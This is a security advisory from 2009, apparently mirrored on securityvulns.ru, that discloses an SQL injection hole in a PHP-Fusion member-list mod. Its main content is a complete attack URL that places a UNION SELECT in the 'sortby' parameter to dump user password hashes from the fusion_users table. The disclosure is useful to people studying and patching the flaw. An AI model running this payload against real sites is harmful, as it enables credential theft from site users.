Computer Security

Security Advisory: PHP-Fusion Mod Members Bewerb Sql Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Plunet BusinessManager failure in access controls and multiple stored cross site scripting

  PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability

  PHP-Fusion Mod E-Cart Sql Injection

  Cross-Site Scripting vulnerability in Xaraya

From:r3d.w0rm_(at)_yahoo.com <r3d.w0rm_(at)_yahoo.com>
Date:11.01.2009
Subject:PHP-Fusion Mod Members Bewerb Sql Injection

#################################################################################
####
####                PHP-Fusion Mod Members Bewerb Sql Injection                  ####
#################################################################################
####
#                                                                                  
 #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#################################################################################
####
#                                                                                  
 #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=204
#                                                                                  
 #
#Dork : :(                                                                          #
#                                                                                  
 #
#################################################################################
####
#                                      [Bug]                                        #
#                                                                                  
 #
#http://Site/[path]/members.
php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,
8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users/*
#                                                                                  
 #
#You must login then use bug .                                                      #
#                                                                                  
 #
#################################################################################
####
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server